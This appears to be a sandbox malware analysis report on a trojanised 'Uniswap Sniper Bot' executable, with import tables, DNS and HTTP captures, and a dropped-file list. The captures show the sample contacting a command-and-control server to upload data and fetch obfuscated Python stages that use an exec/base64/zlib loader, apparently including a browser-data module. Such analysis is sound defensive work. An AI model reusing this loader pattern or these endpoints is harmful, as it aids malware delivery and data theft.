KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 09:36:31.793720961 CET	192.168.2.5	1.1.1.1	0xf177	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:36:35.714200020 CET	192.168.2.5	1.1.1.1	0xa494	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:38:55.539441109 CET	192.168.2.5	1.1.1.1	0xb31e	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:00.827925920 CET	192.168.2.5	1.1.1.1	0x5554	Standard query (0)	www.python.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:03.859802008 CET	192.168.2.5	1.1.1.1	0xce4f	Standard query (0)	pypi.org	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 09:36:31.930804968 CET	1.1.1.1	192.168.2.5	0xf177	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:36:31.930804968 CET	1.1.1.1	192.168.2.5	0xf177	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:36:35.851396084 CET	1.1.1.1	192.168.2.5	0xa494	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:36:35.851396084 CET	1.1.1.1	192.168.2.5	0xa494	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:38:55.773693085 CET	1.1.1.1	192.168.2.5	0xb31e	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:01.029211998 CET	1.1.1.1	192.168.2.5	0x5554	No error (0)	www.python.org	dualstack.python.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 09:39:01.029211998 CET	1.1.1.1	192.168.2.5	0x5554	No error (0)	dualstack.python.map.fastly.net		151.101.0.223	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:01.029211998 CET	1.1.1.1	192.168.2.5	0x5554	No error (0)	dualstack.python.map.fastly.net		151.101.64.223	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:01.029211998 CET	1.1.1.1	192.168.2.5	0x5554	No error (0)	dualstack.python.map.fastly.net		151.101.128.223	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:01.029211998 CET	1.1.1.1	192.168.2.5	0x5554	No error (0)	dualstack.python.map.fastly.net		151.101.192.223	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:03.997227907 CET	1.1.1.1	192.168.2.5	0xce4f	No error (0)	pypi.org		151.101.128.223	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:03.997227907 CET	1.1.1.1	192.168.2.5	0xce4f	No error (0)	pypi.org		151.101.192.223	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:03.997227907 CET	1.1.1.1	192.168.2.5	0xce4f	No error (0)	pypi.org		151.101.0.223	A (IP address)	IN (0x0001)	false
Dec 13, 2024 09:39:03.997227907 CET	1.1.1.1	192.168.2.5	0xce4f	No error (0)	pypi.org		151.101.64.223	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:36:25.889307976 CET	89	OUT	GET /pdown HTTP/1.1 Host: 185.153.182.241:1224 User-Agent: curl/7.83.1 Accept: /
Dec 13, 2024 09:36:27.242264986 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="p.zip" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Wed, 13 Sep 2023 07:44:46 GMT ETag: W/"3117874-18a8d7fee11" Content-Type: application/zip Content-Length: 51476596 Date: Fri, 13 Dec 2024 08:36:27 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 50 4b 03 04 0a 00 00 00 00 00 24 80 d0 56 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 2e 70 79 70 2f 50 4b 03 04 0a 00 00 00 00 00 18 80 d0 56 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 2e 70 79 70 2f 44 4c 4c 73 2f 50 4b 03 04 14 00 00 00 08 00 4f a1 86 55 75 bb 04 c8 68 22 14 00 60 83 34 00 1b 00 00 00 2e 70 79 70 2f 44 4c 4c 73 2f 6c 69 62 63 72 79 70 74 6f 2d 31 5f 31 2e 64 6c 6c ec bd 05 58 d5 4b d7 f7 bf 15 1b 75 63 8b 89 b2 55 6c 74 1b d8 62 c2 11 bb 1b bb 50 0c 54 8e dd b5 45 3d b6 1e bb bb 3b 41 c1 ee 0e 40 6c b1 c0 c6 7e bf 9f 0d 18 e7 7e ee e7 7f 3f ef f5 af f7 ba f6 ef ba fc 31 bf 3d 33 6b d6 5a 33 b3 66 cd 5a 6b c6 da 2d a6 19 ec 0c 06 43 22 fd fb fe dd 60 d8 63 88 7d 2a 1b fe af 1f 87 04 06 43 ea 9c fb 52 1b 76 24 3f 9b 6b 4f 02 af b3 b9 1a 75 ed d6 cf a9 77 5f df 2e 7d db f5 74 ea d0 ae 57 2f 5f 3f a7 f6 9d 9c fa f6 ef e5 d4 ad 97 53 b5 ba 0d 9d 7a fa 76 ec 54 24 55 aa 14 a6 38 18 b7 df dd 6d b7 78 e6 d4 e2 f1 ff 66 3f cf 56 3c 40 7f bf bf 9c 62 5e 68 fd 3b c9 3c c3 fa d7 62 [TRUNCATED] Data Ascii: PK$V.pyp/PKV.pyp/DLLs/PKOUuh"`4.pyp/DLLs/libcrypto-1_1.dllXKucUltbPTE=;A@l~~?1=3kZ3fZk-C"`c}*CRv$?kOuw_.}tW/_?SzvT$U8mxf?V<@b^h;<bc;z4<S?Qj^d]<oA]iTq\2CEmd0f6&G$0I?k.ae% RKv-j5!@Ce.aPYEw~}.ak0DD2}P,!"/_<gE^I`1:P{[X\$! "X,;\[l6hr_v`JXp(_CU.uUw7XrU<gx"wOa[9dpFCG8"7p6Dz,Iot.r&Cd;9"smL]U-Y";"W5`8PBx\Y.+rlsZZ&Tz\[zug/

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:36:25.952100039 CET	686	OUT	POST /uploads HTTP/1.1 host: 185.153.182.241:1224 content-type: multipart/form-data; boundary=--------------------------346360769594120085037004 content-length: 643045 Connection: close Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 34 36 33 36 30 37 36 39 35 39 34 31 32 30 30 38 35 30 33 37 30 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 79 70 65 22 0d 0a 0d 0a 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 34 36 33 36 30 37 36 39 35 39 34 31 32 30 30 38 35 30 33 37 30 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 69 64 22 0d 0a 0d 0a 37 30 31 5f 39 36 35 35 34 33 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 34 36 33 36 30 37 36 39 35 39 34 31 32 30 30 38 35 30 33 37 30 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 74 73 22 0d 0a 0d 0a 31 37 33 34 30 37 38 39 38 33 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ----------------------------346360769594120085037004Content-Disposition: form-data; name="type"7----------------------------346360769594120085037004Content-Disposition: form-data; name="hid"701_965543----------------------------346360769594120085037004Content-Disposition: form-data; name="uts"1734078983----------------------------346360769594120085037004Content-Disposition: form-data; name="multi_file"; filename="0_lst"Content-Type: application/octet-stream
Dec 13, 2024 09:36:28.640831947 CET	253	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Type: application/json; charset=utf-8 Content-Length: 15 ETag: W/"f-NQVRlQfKHCoInEbhALgECMonhCE" Date: Fri, 13 Dec 2024 08:36:28 GMT Connection: close Data Raw: 7b 22 73 74 61 74 75 73 22 3a 74 72 75 65 7d Data Ascii: {"status":true}

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:38:48.763087034 CET	77	OUT	GET /client/7/701 HTTP/1.1 host: 185.153.182.241:1224 Connection: close
Dec 13, 2024 09:38:50.125256062 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="main7_701.py" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Thu, 21 Nov 2024 09:47:57 GMT ETag: W/"13cb-1934e1f0abc" Content-Type: application/octet-stream Content-Length: 5067 Date: Fri, 13 Dec 2024 08:38:49 GMT Connection: close Data Raw: 5f 20 3d 20 6c 61 6d 62 64 61 20 5f 5f 20 3a 20 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 7a 6c 69 62 27 29 2e 64 65 63 6f 6d 70 72 65 73 73 28 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 62 61 73 65 36 34 27 29 2e 62 36 34 64 65 63 6f 64 65 28 5f 5f 5b 3a 3a 2d 31 5d 29 29 3b 65 78 65 63 28 28 5f 29 28 62 27 3d 63 33 58 4b 77 37 44 2b 2f 2f 76 6e 72 66 74 76 78 41 61 43 63 66 41 61 6b 41 7a 6f 30 76 43 6c 4b 42 64 53 2f 70 58 4e 33 7a 55 76 6a 6e 32 74 31 46 59 53 4d 5a 6f 66 43 4b 6a 6d 4f 4d 6f 42 34 4b 30 41 52 41 46 74 66 4b 61 4c 39 74 31 44 75 6f 68 30 4e 6f 6f 70 52 75 50 6d 6b 4a 7a 76 77 71 30 33 74 33 6f 59 6f 79 54 50 7a 31 75 2f 30 5a 78 31 44 70 66 4f 51 32 41 2b 65 5a 55 68 55 6d 56 69 4e 36 2b 2b 46 58 49 79 2f 39 45 70 68 6b 4e 2b 36 52 51 31 49 2b 6c 71 53 39 64 6e 51 32 68 53 55 51 74 47 53 4f 77 52 59 43 76 44 55 77 49 6b 42 64 73 37 55 67 50 61 79 57 34 79 72 64 74 70 5a 36 4f 77 43 4e 4b 52 67 77 72 2f 64 45 44 46 32 35 5a 64 4d 63 32 48 57 6e 4b 72 32 2f 30 59 47 64 4d 78 6d 55 45 4f 56 47 [TRUNCATED] Data Ascii: _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'=c3XKw7D+//vnrftvxAaCcfAakAzo0vClKBdS/pXN3zUvjn2t1FYSMZofCKjmOMoB4K0ARAFtfKaL9t1Duoh0NoopRuPmkJzvwq03t3oYoyTPz1u/0Zx1DpfOQ2A+eZUhUmViN6++FXIy/9EphkN+6RQ1I+lqS9dnQ2hSUQtGSOwRYCvDUwIkBds7UgPayW4yrdtpZ6OwCNKRgwr/dEDF25ZdMc2HWnKr2/0YGdMxmUEOVG9w4LN6y1j0MOgoHJ5SOynUYjgNwd66UGKh2nRGTJCtEB4eUJsz0PCukI8qmkxhCT5k0zV0ZEA7o5o2hWFeMFka5J4kim3ohN+MVO9H3hcQgvaiFGlCtxc229O8gp6r3EK7AJ8DOB1it6IImt5s4OkZWJP0Ny/PbwWKLTRM7MVL4WZTJVSafzXlQI0j25gL9ciGNlpUUZ9nCtaMifUGHmhx4wHUcsTXmn79VqF+/R2zUlPOmRihy//yLJ+qqye5VFQrk/K/F6e6tCtzx0DScO7pOGjXemux7gnOuxHCvCpQsnUeZHlWp2Rf4Iw3zWlPNuiSRfv3c/0NWiHUEMU1g7VmgiN0c59C2Slg4PzL6q7WmphKoVGaLe0KUc5/O83MC2yZrSKcO1TCRKV4VxN2H/ac/AoogV7M/aN7OTSkF6vvmqh21rcpqgY0qfECg2sf+qKjHAtRCnLcn/xrIvh4MKyHyTAEG/gWJAEVprIMgidO5/mv5BhsjRpIOmKCk66LZk8JeCnM

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:38:53.613837004 CET	164	OUT	GET /payload/7/701 HTTP/1.1 Host: 185.153.182.241:1224 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Dec 13, 2024 09:38:54.980809927 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="pay7_701.py" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Thu, 21 Nov 2024 09:31:40 GMT ETag: W/"4913-1934e10212c" Content-Type: application/octet-stream Content-Length: 18707 Date: Fri, 13 Dec 2024 08:38:54 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 5f 20 3d 20 6c 61 6d 62 64 61 20 5f 5f 20 3a 20 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 7a 6c 69 62 27 29 2e 64 65 63 6f 6d 70 72 65 73 73 28 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 62 61 73 65 36 34 27 29 2e 62 36 34 64 65 63 6f 64 65 28 5f 5f 5b 3a 3a 2d 31 5d 29 29 3b 65 78 65 63 28 28 5f 29 28 62 27 73 70 2b 4c 41 45 77 2f 2f 39 37 6e 6c 6e 36 66 6a 32 36 57 62 57 37 58 35 72 39 4a 68 73 4c 57 31 37 32 36 6b 78 70 58 33 36 54 2f 43 4e 48 72 43 43 4a 55 38 7a 45 39 4b 6d 50 5a 54 76 51 35 77 70 41 78 6c 71 33 61 42 56 77 45 72 47 43 2b 41 59 61 42 41 79 59 4a 31 75 6a 34 2b 69 4a 77 64 47 63 71 59 5a 61 71 74 69 4e 5a 6d 76 51 66 51 66 37 74 57 6b 75 67 7a 38 73 59 70 4f 41 68 76 53 38 47 39 48 46 53 6d 67 4a 37 6e 78 6f 77 69 2f 4d 5a 45 45 4c 44 78 36 4d 6d 68 62 4f 47 6c 70 56 57 76 6e 55 31 48 77 65 52 70 74 72 46 33 2b 58 4f 6c 78 75 54 32 70 4e 61 4c 56 77 2f 2f 33 7a 31 33 45 75 4f 67 31 50 53 37 39 48 74 4d 4a 49 43 44 6b 49 52 4c 7a 45 42 52 70 32 67 32 5a 74 30 66 43 74 5a 43 70 61 48 73 68 64 [TRUNCATED] Data Ascii: _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'sp+LAEw//97nln6fj26WbW7X5r9JhsLW1726kxpX36T/CNHrCCJU8zE9KmPZTvQ5wpAxlq3aBVwErGC+AYaBAyYJ1uj4+iJwdGcqYZaqtiNZmvQfQf7tWkugz8sYpOAhvS8G9HFSmgJ7nxowi/MZEELDx6MmhbOGlpVWvnU1HweRptrF3+XOlxuT2pNaLVw//3z13EuOg1PS79HtMJICDkIRLzEBRp2g2Zt0fCtZCpaHshd+0v8+/qU+g8xAZf2M1SYtbN3p1m04/5apd6ss4Q0uflL4TXtcssJgZs2xQs4Qz4TyUH9BD3TXS9xTLIBgj2ACofpGAICSi6Gmlaat3I2v0F9qo+qrWmF4E/Auz0lv4s6BJOeYPqZV45ithfM/zWuY9YYQpGWLPX8RHGIByhhKjGcZt+xT6NDwwh36HSWU54LzqycXMKPn/Ge/zm2qw/jCdlYTaGehrzKNWuwI9luPmrJhk4eFc7xUBgzF+kUvX0MzMtno8VbJfAr8xht219FJrFSRHY+9Eqcq6Q9wmuK72xevCxz2NU7+Hoye47yeHZui2f1csRdgfuZT0+Oul1E+aw7EXGe7ewde6+5VURbVV+0wrd7LoL7/w4+ESifvtIJI55A21ZXVYgPZ8Kldw/UBaJKmUGU4V1gqg+DTjxX335jYWh9QeK04aWNh732+oFc2MFU6HZkQi62Vt539bwkr05qBIvQ8KS9/aL9YWXDzh

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:38:55.319066048 CET	161	OUT	GET /brow/7/701 HTTP/1.1 Host: 185.153.182.241:1224 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Dec 13, 2024 09:38:56.680855036 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="brow7_701.py" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Thu, 21 Nov 2024 10:07:50 GMT ETag: W/"36ab7-1934e313e8f" Content-Type: application/octet-stream Content-Length: 223927 Date: Fri, 13 Dec 2024 08:38:56 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 5f 20 3d 20 6c 61 6d 62 64 61 20 5f 5f 20 3a 20 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 7a 6c 69 62 27 29 2e 64 65 63 6f 6d 70 72 65 73 73 28 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 62 61 73 65 36 34 27 29 2e 62 36 34 64 65 63 6f 64 65 28 5f 5f 5b 3a 3a 2d 31 5d 29 29 3b 65 78 65 63 28 28 5f 29 28 62 27 72 57 52 46 45 4e 67 2f 2f 2f 33 50 72 43 4e 38 47 72 79 4b 50 61 45 65 38 71 51 43 54 43 53 70 43 6f 4e 7a 32 63 5a 61 35 30 31 2f 61 51 43 4f 6f 57 6f 2f 6a 5a 32 6c 65 4e 74 54 54 73 68 67 64 39 32 73 37 33 4a 68 53 47 6e 68 59 30 6e 72 62 6d 75 68 55 63 31 76 6a 6e 68 58 6a 35 58 38 73 53 44 38 37 78 41 53 48 4a 59 4e 48 41 56 6a 7a 65 4c 52 45 6e 4e 42 73 68 46 33 35 58 43 4b 73 44 6e 4d 6b 6e 4b 75 51 6e 77 6a 51 5a 45 59 6d 44 46 66 62 47 43 7a 65 34 64 47 6b 36 72 38 4f 66 62 31 68 73 53 49 53 43 6f 6e 47 64 58 58 4c 43 30 76 35 52 2b 70 63 78 6e 78 43 36 58 47 32 56 6a 53 59 41 57 66 76 64 76 74 30 61 73 32 78 47 53 42 43 56 50 53 47 4c 52 39 31 54 2f 51 34 38 43 36 35 50 63 4c 32 54 4d 59 56 6b 48 [TRUNCATED] Data Ascii: _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'rWRFENg///3PrCN8GryKPaEe8qQCTCSpCoNz2cZa501/aQCOoWo/jZ2leNtTTshgd92s73JhSGnhY0nrbmuhUc1vjnhXj5X8sSD87xASHJYNHAVjzeLREnNBshF35XCKsDnMknKuQnwjQZEYmDFfbGCze4dGk6r8Ofb1hsSISConGdXXLC0v5R+pcxnxC6XG2VjSYAWfvdvt0as2xGSBCVPSGLR91T/Q48C65PcL2TMYVkH5LamEjNvhamaTdlCKU0KmuDlkF4UhRkKkuhszhzD8Ivufp3DnDd6BYloKSdCiPPt5ucH8JfQ9XbdzwAHlwJWQZENN0TMX7+rl38rfJUjwPY8aXNdF2YDZQl9xGq8sGUA/WxnN/o3dl8GMqFu3LwGkcEV06Ik444iBc0ENkD8gwTPxIlmEnzgW/nsfnMUEf7Yt5ltM2wrVy7ss4mCpT/ncEpghShTt60Apq513L89g4HA4xZhfhrfMp8yh2AkZEWYU9lyzTaarK4+spXrjfpT4uSD8kXR6l0N9ES33WKcwTLInghYrR0GfXhmwdzxxZue+zRrapR0HIuxStftoCCa5tp8C22sO4ZKpt9rgK57EW5ejX104oNLd8Y+vukCi47zXywS9Us+EwYVOoRZzuUZeSQgL05D7TA0hOYXNgZzWQygfi7EY3zHxLElPNa8fuMBalTdQOhlVvxqabv+v/W7PhI//YAOsTZyTa9XZa3

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 09:38:55.896159887 CET	145	OUT	GET /json HTTP/1.1 Host: ip-api.com User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Dec 13, 2024 09:38:57.052843094 CET	483	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:38:56 GMT Content-Type: application/json; charset=utf-8 Content-Length: 306 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Uniswap Sniper Bot With GUI.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\.n2\bow

C:\Users\user\.n2\mlip

C:\Users\user\.n2\pay

C:\Users\user\.pyp\DLLs\_asyncio.pyd

C:\Users\user\.pyp\DLLs\_bz2.pyd

C:\Users\user\.pyp\DLLs\_ctypes.pyd

C:\Users\user\.pyp\DLLs\_decimal.pyd

C:\Users\user\.pyp\DLLs\_elementtree.pyd

C:\Users\user\.pyp\DLLs\_hashlib.pyd

C:\Users\user\.pyp\DLLs\_lzma.pyd

C:\Users\user\.pyp\DLLs\_msi.pyd

C:\Users\user\.pyp\DLLs\_multiprocessing.pyd

C:\Users\user\.pyp\DLLs\_overlapped.pyd

C:\Users\user\.pyp\DLLs\_queue.pyd

C:\Users\user\.pyp\DLLs\_socket.pyd

C:\Users\user\.pyp\DLLs\_sqlite3.pyd

C:\Users\user\.pyp\DLLs\_ssl.pyd

Windows Analysis Report
Uniswap Sniper Bot With GUI.exe

C:\Users\user\.pyp\Lib\pycache\future.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\future.cpython-311.pyc.2128155203424

C:\Users\user\.pyp\Lib\pycache\_compat_pickle.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\_compat_pickle.cpython-311.pyc.2784509867952

C:\Users\user\.pyp\Lib\pycache\_compression.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\_compression.cpython-311.pyc.2126053439536

C:\Users\user\.pyp\Lib\pycache\_weakrefset.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\_weakrefset.cpython-311.pyc.2128153979696

C:\Users\user\.pyp\Lib\pycache\ast.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\ast.cpython-311.pyc.2784498438128

C:\Users\user\.pyp\Lib\pycache\base64.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\base64.cpython-311.pyc.2128149338176

C:\Users\user\.pyp\Lib\pycache\bisect.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\bisect.cpython-311.pyc.2126016193440

C:\Users\user\.pyp\Lib\pycache\bz2.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\bz2.cpython-311.pyc.2126053635920

C:\Users\user\.pyp\Lib\pycache\calendar.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\calendar.cpython-311.pyc.2126016196464

C:\Users\user\.pyp\Lib\pycache\colorsys.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\colorsys.cpython-311.pyc.2784510091744

C:\Users\user\.pyp\Lib\pycache\configparser.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\configparser.cpython-311.pyc.2784509705648

C:\Users\user\.pyp\Lib\pycache\contextlib.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\contextlib.cpython-311.pyc.2128155199056

C:\Users\user\.pyp\Lib\pycache\copy.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\copy.cpython-311.pyc.2126052398272

C:\Users\user\.pyp\Lib\pycache\copyreg.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\copyreg.cpython-311.pyc.2128155279856

